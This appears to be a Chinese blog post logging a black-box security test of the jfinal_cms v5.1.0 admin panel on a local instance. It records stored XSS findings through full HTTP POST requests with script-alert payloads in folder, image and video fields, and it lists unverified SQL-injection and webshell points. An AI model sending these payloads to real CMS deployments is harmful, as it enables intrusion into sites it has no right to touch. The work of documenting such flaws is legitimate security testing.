jfinal_cms-v5.1.0 admin 黑盒

发布时间:2026/5/31 0:25:51
jfinal_cms-v5.1.0 admin 黑盒 00x1 接口收集admin/advicefeedback/list admin/article/list admin/article/list_approve admin/comment/list admin/contact/list admin/filemanager/list admin/folder/add/ admin/folder/delete/ admin/folder/edit/ admin/folder/list admin/folder/view/ admin/foldernotice/list admin/folderrollpicture/list admin/friendlylink/list admin/home admin/image/list admin/imagealbum/list admin/imageshow/list admin/logout admin/operation admin/pageview admin/person admin/person/site/ admin/site/list admin/video/list admin/videoalbum/list system/config system/department system/dict system/log/list system/menu system/role system/user访问结果00x2 未授权越权他的鉴权做得非常好所以基本不需要测试授权了之后测试00x3 内容管理0x1 SQL可能存在,未验证修改/jfinal_cms/admin/folder/edit/259删除/jfinal_cms/admin/folder/delete/257/jfinal_cms/admin/folder/view/257查看添加admin xss?)POST /jfinal_cms/admin/folder/save/0 HTTP/1.1 Host: localhost:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:149.0) Gecko/20100101 Firefox/149.0 Accept: text/html,application/xhtmlxml,application/xml;q0.9,*/*;q0.8 Accept-Language: zh-CN,zh;q0.9,zh-TW;q0.8,zh-HK;q0.7,en-US;q0.6,en;q0.5 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Content-Length: 281 Origin: http://localhost:8080 Connection: keep-alive Referer: http://localhost:8080/jfinal_cms/admin/folder/add/0 Cookie: JSESSIONIDE1AD78FB934D8DFADE48FF96F73D472A; Hm_lvt_1040d081eea13b44d84a4af639640d511774432118,1774498388,1774610423; Hm_lpvt_1040d081eea13b44d84a4af639640d511774682483; HMACCOUNTA2CF3FA6A7F759C5; session_userVrhFVJS2SgewvZrFcwCawA Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: iframe Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 Priority: u4 model.idmodel.parent_id0model.name111model.material_type102model.key1112model.path1111111111111111111111111111111111111model.sort10model.status1model.type1model.jump_url123456model.content123model.seo_title1233model.seo_keywords1model.seo_description12440x2 xss验证成功名称xss破坏页面Domvar oper; jQuery(function($) { // 页面方法 oper { width : 750, height : 550, form : document.form1, list : function() { var url admin/folder/list; this.form.action url; this.form.submit(); }, view : function(id) { var url admin/folder/view/id; var title 查看目录; Iframe(url, this.width, this.height, title, false, false, false, EmptyFunc); }, add : function(id) { id id||0; var url admin/folder/add/id; var title 添加目录; Iframe(url, this.width, this.height, title); }, edit : function(id) { var url admin/folder/edit/id; var title 修改目录; Iframe(url, this.width, this.height, title); }, del : function(id) { var url admin/folder/delete/id; var title 确认要删除该目录信息; Confirm(title, function() { form1.action url; form1.submit(); }); } }; //显示Menu索引 showMenu(page_folder); }); //分页 var paginator function(page) { oper.list(); }; var zTree; var demoIframe; var newCount0; function addHoverDom(treeId, treeNode) { var sObj $(# treeNode.tId _span); if (treeNode.editNameFlag || $(#addBtn_treeNode.tId).length0) return; var addStr span classbutton add idaddBtn_ treeNode.tId /span; addStr span classbutton edit ideditBtn_ treeNode.tId /span; addStr span classbutton remove idremoveBtn_ treeNode.tId titleadd node onfocusthis.blur();/span; sObj.after(addStr); var addBtn $(#addBtn_treeNode.tId); if (addBtn) addBtn.bind(click, function(){ oper.add(treeNode.id); return false; }); var editBtn $(#editBtn_treeNode.tId); if (editBtn) editBtn.bind(click, function(){ oper.edit(treeNode.id); return false; }); var delBtn $(#removeBtn_treeNode.tId); if (delBtn) delBtn.bind(click, function(){ oper.del(treeNode.id); return false; }); }; function removeHoverDom(treeId, treeNode) { $(#addBtn_treeNode.tId).unbind().remove(); $(#removeBtn_treeNode.tId).unbind().remove(); $(#editBtn_treeNode.tId).unbind().remove(); }; var setting { check: { enable: false }, view: { addHoverDom: addHoverDom, removeHoverDom: removeHoverDom, dblClickExpand: false, showLine: true, selectedMulti: false }, data: { simpleData: { enable:true, idKey: id, pIdKey: pId, rootPId: } }, callback: { beforeClick: function(treeId, treeNode) { var zTree $.fn.zTree.getZTreeObj(tree); if (treeNode.isParent) { zTree.expandNode(treeNode); return false; } else { // demoIframe.attr(src,treeNode.file .html); return true; } } } }; var zNodes [ {id:268, pId:257, name:111, open:true} , {id:269, pId:0, name:111, open:true} , {id:270, pId:257, name:scriptalert(11) , open:true} , {id:257, pId:0, name:jfinal-cms, open:true} , {id:258, pId:0, name:jfinal, open:true} , {id:259, pId:0, name:beetl, open:true} , {id:260, pId:0, name:mysql, open:true} , {id:261, pId:0, name:其他, open:true} , {id:262, pId:261, name:博客站点, open:true} , {id:263, pId:261, name:资讯站点, open:true} , {id:264, pId:261, name:论坛站点, open:true} , {id:265, pId:261, name:网站站点, open:true} , {id:267, pId:261, name:标签查询, open:true} , {id:266, pId:261, name:意见反馈, open:true} ]; $(document).ready(function(){ var t $(#tree); t $.fn.zTree.init(t, setting, zNodes); demoIframe $(#testIframe); demoIframe.bind(load, loadReady); var zTree $.fn.zTree.getZTreeObj(tree); // zTree.selectNode(zTree.getNodeByParam(id, 101)); }); function loadReady() { var bodyH demoIframe.contents().find(body).get(0).scrollHeight, htmlH demoIframe.contents().find(html).get(0).scrollHeight, maxH Math.max(bodyH, htmlH), minH Math.min(bodyH, htmlH), h demoIframe.height() maxH ? minH:maxH ; if (h 530) h 530; }接可以xss这个影响渲染00x4 素材管理00x1图片管理http://localhost:8080/jfinal_cms/admin/imageshow/edit/10x1 xss验证成功http://localhost:8080/jfinal_cms/admin/imageshow/edit/1POST /jfinal_cms/admin/image/save/2 HTTP/1.1 Host: localhost:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:149.0) Gecko/20100101 Firefox/149.0 Accept: text/html,application/xhtmlxml,application/xml;q0.9,*/*;q0.8 Accept-Language: zh-CN,zh;q0.9,zh-TW;q0.8,zh-HK;q0.7,en-US;q0.6,en;q0.5 Accept-Encoding: gzip, deflate, br Content-Type: multipart/form-data; boundary----geckoformboundarya543911c825a9e3846f9eb5233f9f38c Content-Length: 1762 Origin: http://localhost:8080 Connection: keep-alive Referer: http://localhost:8080/jfinal_cms/admin/image/edit/2 Cookie: JSESSIONID24719248ADB2162EDF2DE03DB8133FDD; Hm_lvt_1040d081eea13b44d84a4af639640d511774432118,1774498388,1774610423; Hm_lpvt_1040d081eea13b44d84a4af639640d511774694150; HMACCOUNTA2CF3FA6A7F759C5; session_userVrhFVJS2SgewvZrFcwCawA Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: iframe Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 Priority: u4 ------geckoformboundarya543911c825a9e3846f9eb5233f9f38c Content-Disposition: form-data; namemodel.id 2 ------geckoformboundarya543911c825a9e3846f9eb5233f9f38c Content-Disposition: form-data; namemodel.album_name 风景 ------geckoformboundarya543911c825a9e3846f9eb5233f9f38c Content-Disposition: form-data; namemodel.album_id 1 ------geckoformboundarya543911c825a9e3846f9eb5233f9f38c Content-Disposition: form-data; namemodel.name scriptalert(16)/script ------geckoformboundarya543911c825a9e3846f9eb5233f9f38c Content-Disposition: form-data; namemodel.image_net_url scriptalert(1)/script ------geckoformboundarya543911c825a9e3846f9eb5233f9f38c Content-Disposition: form-data; namemodel.image_url; filename Content-Type: application/octet-stream ------geckoformboundarya543911c825a9e3846f9eb5233f9f38c Content-Disposition: form-data; namemodel.sort 10 ------geckoformboundarya543911c825a9e3846f9eb5233f9f38c Content-Disposition: form-data; namemodel.status 1 ------geckoformboundarya543911c825a9e3846f9eb5233f9f38c Content-Disposition: form-data; namemodel.is_recommend 2 ------geckoformboundarya543911c825a9e3846f9eb5233f9f38c Content-Disposition: form-data; namemodel.publish_time scriptalert(666)/script ------geckoformboundarya543911c825a9e3846f9eb5233f9f38c Content-Disposition: form-data; namemodel.publish_user scriptalert(3)/script ------geckoformboundarya543911c825a9e3846f9eb5233f9f38c Content-Disposition: form-data; namemodel.remark scriptalert(12)/script ------geckoformboundarya543911c825a9e3846f9eb5233f9f38c Content-Disposition: form-data; nametags scriptalert(13)/script ------geckoformboundarya543911c825a9e3846f9eb5233f9f38c--如果查看0x2 木马(未验证0x3 注入未验证0x4 删除注入未验证00x2 我的相册0x1 xss失败转义了0x2 编辑大马未验证0x3 删除注入未验证00x3 相册管理(暂时报错00x4 视频专辑管理0x1 删除注入未验证0x2 xss成功专辑名称存在xss00x5 视频管理0x1 播放注入未验证0x2 xss未验证修改POST /jfinal_cms/admin/video/save/6 HTTP/1.1 Host: localhost:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:149.0) Gecko/20100101 Firefox/149.0 Accept: text/html,application/xhtmlxml,application/xml;q0.9,*/*;q0.8 Accept-Language: zh-CN,zh;q0.9,zh-TW;q0.8,zh-HK;q0.7,en-US;q0.6,en;q0.5 Accept-Encoding: gzip, deflate, br Content-Type: multipart/form-data; boundary----geckoformboundarya14b721c65b07e62bfe6513c03cbca3b Content-Length: 2003 Origin: http://localhost:8080 Connection: keep-alive Referer: http://localhost:8080/jfinal_cms/admin/video/edit/6 Cookie: JSESSIONID24719248ADB2162EDF2DE03DB8133FDD; Hm_lvt_1040d081eea13b44d84a4af639640d511774432118,1774498388,1774610423; Hm_lpvt_1040d081eea13b44d84a4af639640d511774694150; HMACCOUNTA2CF3FA6A7F759C5; session_userVrhFVJS2SgewvZrFcwCawA Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: iframe Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 Priority: u4 ------geckoformboundarya14b721c65b07e62bfe6513c03cbca3b Content-Disposition: form-data; namemodel.id 6 ------geckoformboundarya14b721c65b07e62bfe6513c03cbca3b Content-Disposition: form-data; namemodel.album_name 动漫 ------geckoformboundarya14b721c65b07e62bfe6513c03cbca3b Content-Disposition: form-data; namemodel.album_id 4 ------geckoformboundarya14b721c65b07e62bfe6513c03cbca3b Content-Disposition: form-data; namemodel.name 娱乐5 ------geckoformboundarya14b721c65b07e62bfe6513c03cbca3b Content-Disposition: form-data; namemodel.video_net_url scriptalert(6662)/script ------geckoformboundarya14b721c65b07e62bfe6513c03cbca3b Content-Disposition: form-data; namemodel.video_url; filename Content-Type: application/octet-stream ------geckoformboundarya14b721c65b07e62bfe6513c03cbca3b Content-Disposition: form-data; namemodel.thumbnail scriptalert(6663)/script ------geckoformboundarya14b721c65b07e62bfe6513c03cbca3b Content-Disposition: form-data; namemodel.sort 9 ------geckoformboundarya14b721c65b07e62bfe6513c03cbca3b Content-Disposition: form-data; namemodel.status 1 ------geckoformboundarya14b721c65b07e62bfe6513c03cbca3b Content-Disposition: form-data; namemodel.is_comment 1 ------geckoformboundarya14b721c65b07e62bfe6513c03cbca3b Content-Disposition: form-data; namemodel.is_recommend 2 ------geckoformboundarya14b721c65b07e62bfe6513c03cbca3b Content-Disposition: form-data; namemodel.publish_time scriptalert(6666)/script ------geckoformboundarya14b721c65b07e62bfe6513c03cbca3b Content-Disposition: form-data; namemodel.publish_user 系统管理员 ------geckoformboundarya14b721c65b07e62bfe6513c03cbca3b Content-Disposition: form-data; namemodel.remark scriptalert(6664)/script ------geckoformboundarya14b721c65b07e62bfe6513c03cbca3b Content-Disposition: form-data; nametags scriptalert(6665)/script ------geckoformboundarya14b721c65b07e62bfe6513c03cbca3b--打开触发xss0x3 修改注入未验证0x4 大马未验证0x5 删除注入未验证00x5 首页0x1 ip xss未测试00x6 意见管理时间可不可控00x7 其他管理0x1 友情连接0x1 xss成功名称成功0x2 删除注入未验证0x2 联系人管理0x1 xss成功432 成功打开所有都有xss0x2 删除注入未验证00x8 模板管理0x1 大马未验证00x9 系统管理xss 后面不测试了一堆0x1 sql (未验证http://localhost:8080/jfinal_cms/system/department/delete/2http://localhost:8080/jfinal_cms/system/user/delete/10http://localhost:8080/jfinal_cms/system/role/delete/1http://localhost:8080/jfinal_cms/system/menu/delete/21http://localhost:8080/jfinal_cms/system/dict/delete/13http://localhost:8080/jfinal_cms/system/config/delete/21疑问这个什么时候加的

相关新闻

超越基础:NestJS文件上传的创意应用场景探索

超越基础:NestJS文件上传的创意应用场景探索

2026/5/31 0:25:16
Qwen2-VL-2B-Instruct与Java企业级应用整合

Qwen2-VL-2B-Instruct与Java企业级应用整合

2026/5/29 18:51:30
3步解锁音乐歌词管理新体验:告别繁琐,让每首歌都有完美字幕

3步解锁音乐歌词管理新体验:告别繁琐,让每首歌都有完美字幕

2026/5/30 4:08:14
告别预览延迟:Markn如何用智能渲染技术重塑Markdown写作体验

告别预览延迟:Markn如何用智能渲染技术重塑Markdown写作体验

2026/5/31 0:24:36
从Proteus仿真到实物焊接:手把手复刻一个51单片机智能电子秤(附完整代码与调试心得)

从Proteus仿真到实物焊接:手把手复刻一个51单片机智能电子秤(附完整代码与调试心得)

2026/5/31 0:24:36
不止于呼吸灯:挖掘STC8H高级PWM的电机控制潜力,从寄存器配置看H桥驱动

不止于呼吸灯:挖掘STC8H高级PWM的电机控制潜力,从寄存器配置看H桥驱动

2026/5/31 0:24:36
从glmnet的cv.glmnet结果图里,你看懂了什么?手把手教你解读LASSO回归的交叉验证图

从glmnet的cv.glmnet结果图里,你看懂了什么?手把手教你解读LASSO回归的交叉验证图

2026/5/31 0:24:15
你的3D医学图像预处理拖慢训练速度了吗?聊聊裁剪、重采样与归一化的性能优化细节

你的3D医学图像预处理拖慢训练速度了吗?聊聊裁剪、重采样与归一化的性能优化细节

2026/5/31 0:24:15
手把手教你:把Windows Server 2016 Eval版转成正式版或数据中心版(含密钥)

手把手教你:把Windows Server 2016 Eval版转成正式版或数据中心版(含密钥)

2026/5/31 0:23:14
毕业论文神器!2026最新AI论文写作软件测评与推荐

毕业论文神器!2026最新AI论文写作软件测评与推荐

2026/5/31 0:01:48
基于指数矩的车牌识别解析方案【附代码】

基于指数矩的车牌识别解析方案【附代码】

2026/5/31 0:03:09
前轮驱动自行车机器人建模与自适应控制策略优化【附代码】

前轮驱动自行车机器人建模与自适应控制策略优化【附代码】

2026/5/31 0:03:09
毕业论文神器!2026最新AI论文写作软件测评与推荐

毕业论文神器!2026最新AI论文写作软件测评与推荐

2026/5/31 0:01:48
基于指数矩的车牌识别解析方案【附代码】

基于指数矩的车牌识别解析方案【附代码】

2026/5/31 0:03:09
前轮驱动自行车机器人建模与自适应控制策略优化【附代码】

前轮驱动自行车机器人建模与自适应控制策略优化【附代码】

2026/5/31 0:03:09
从stress到stress-ng:一文搞懂Linux压力测试工具怎么选?实战对比CPU/内存/磁盘压测效果

从stress到stress-ng:一文搞懂Linux压力测试工具怎么选?实战对比CPU/内存/磁盘压测效果

2026/5/29 15:36:20
从TTL到eDP:嵌入式工程师选屏接口的实战避坑指南(附信号实测对比)

从TTL到eDP:嵌入式工程师选屏接口的实战避坑指南(附信号实测对比)

2026/5/29 15:36:19
实测 Taotoken 多模型路由的响应延迟与稳定性体感

实测 Taotoken 多模型路由的响应延迟与稳定性体感

2026/5/30 16:53:08